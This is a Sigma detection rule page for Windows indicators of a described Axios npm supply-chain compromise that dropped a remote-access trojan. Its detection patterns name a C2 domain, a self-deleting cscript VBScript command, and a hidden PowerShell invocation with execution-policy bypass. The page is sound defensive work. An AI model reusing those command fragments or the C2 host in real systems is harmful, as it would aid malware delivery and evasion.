Axios NPM Compromise Indicators - Windows

calendar Apr 28, 2026 · attack.initial-access attack.t1195.002 attack.execution attack.command-and-control attack.t1059.003 attack.t1059.005 attack.t1105 detection.emerging-threats  ·
Share on: linkedin copy

Detects the specific Windows execution chain and process tree associated with the Axios NPM supply chain compromise. On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper. The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection. The attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.

Sigma rule (View on GitHub)

 1title: Axios NPM Compromise Indicators - Windows
 2id: f6c27ecc-d890-4452-80e6-2e274a10e097
 3status: experimental
 4description: |
 5    Detects the specific Windows execution chain and process tree associated with the Axios NPM supply chain compromise.
 6    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper.
 7    The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
 8    The attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.    
 9references:
10    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
11    - https://thehackernews.com/2026/03/axios-supply-chain-attack-pushes-cross.html?m=1
12    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
13    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
14    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
15author: Swachchhanda Shrawan Poudel (Nextron Systems)
16date: 2026-04-01
17tags:
18    - attack.initial-access
19    - attack.t1195.002
20    - attack.execution
21    - attack.command-and-control
22    - attack.t1059.003
23    - attack.t1059.005
24    - attack.t1105
25    - detection.emerging-threats
26logsource:
27    category: process_creation
28    product: windows
29detection:
30    selection_cscript:
31        ParentImage|endswith:
32            - '\node.exe'
33            - '\bun.exe'
34        Image|endswith: '\cmd.exe'
35        CommandLine|contains|all:
36            - 'cscript'
37            - 'AppData\Local\Temp'
38            - '//nologo && del'
39            - '6202033.vbs'
40    selection_curl:
41        Image|endswith:
42            - '\curl.exe'
43            - '\powershell.exe'
44        CommandLine|contains: 'http://sfrclak.com'
45    selection_susp_cli:
46        OriginalFileName: 'PowerShell.EXE'
47        CommandLine|contains: '"C:\ProgramData\wt.exe" -w hidden -ep bypass -file'
48    condition: 1 of selection_*
49falsepositives:
50    - Highly unlikely
51level: high

References

Related rules

to-top